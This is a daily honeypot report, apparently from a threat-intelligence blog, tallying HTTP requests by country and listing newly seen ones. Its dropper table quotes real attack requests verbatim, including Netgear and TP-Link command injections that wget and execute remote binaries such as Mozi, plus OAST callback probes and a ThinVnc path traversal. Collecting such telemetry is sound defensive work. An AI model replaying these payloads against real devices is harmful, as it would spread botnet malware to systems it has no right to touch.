Skip to main content
  1. Daily-Posts/

Report: 2025-05-26

·354 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-26
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 6 stage 1 IP address(es), linked to 6 dropper URL(s).

There are 12 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1562 requests were recorded during the day, originating from 6 different countries, with a peak of 490 requests coming from SA.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
125.44.27.216GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
142.154.59.187GET /backupmgt/localJob.php?session=fail;wget+http://d0q39sn0prvpilv9a4p06176by7bhgr61.oast.online; HTTP/1.1
142.154.59.187GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d0q39sn0prvpilv9a4p0fo36b893dri41.oast.online; HTTP/1.1
142.154.59.187GET /backupmgt/localJob.php?session=fail;wget+http://d0q39sn0prvpilv9a4p0pagjn1u3nbogj.oast.online; HTTP/1.1
142.154.59.187GET /backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d0q39sn0prvpilv9a4p0wdosafrs94798.oast.online; HTTP/1.1
141.98.11.137GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F212.81.47.226%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
354GET /talari/app/files/2xcyvqOz67kkLSz9qERHbfNJIem HTTP/1.1
514GET /Uploads/2xcyvrxOpkunWkRc21dL1UWelVp.php7 HTTP/1.1
1094GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/2xcyvuFVtfIgkUFngKGg3z70j5x.jsp HTTP/1.1
1304GET /debugging_center_utils_.php?log=;echo%20gsoydnodmclnfunmfqnuvfekqpcgexmg%20
1314GET /debugging_center_utils_.php?log=;echo%20gsoydnodmclnfunmfqnuvfekqpcgexmg%20
1494GET /fileserver/2xcyvpL0XioN3S0XnbWtHiFmeIq.txt HTTP/1.1
2442GET /webadmin/script?command=
2472GET /2xcyvtr109oWWIfFvZu5eeqfTis/../../ThinVnc.ini HTTP/1.1
2522PUT /fileserver/2xcyvpL0XioN3S0XnbWtHiFmeIq.txt HTTP/1.1
2562GET /webadmin/script?command=
3321GET /iFYT HTTP/1.1
3331GET /iHHd HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0490SA
1232BG
2190US
3101DE
498JP
564PL
660NL
752CN
850VN
936GB
1026HK
1119LT
1215SG
1313AZ
1412SC
1511AU
1610FR
179GH
188BR
198KR
207RO
217CA
226RU
235AO
244IL
254CH
263SE
273IN
282MD
292IE
302IT
312TW
322CL
332IR
342BE
351AR
361ES
371MC
381JO
391KZ

Related

Report: 2025-05-25
·2459 words
Repport Daily
Report: 2025-05-24
·3208 words
Repport Daily
Report: 2025-05-23
·359 words
Repport Daily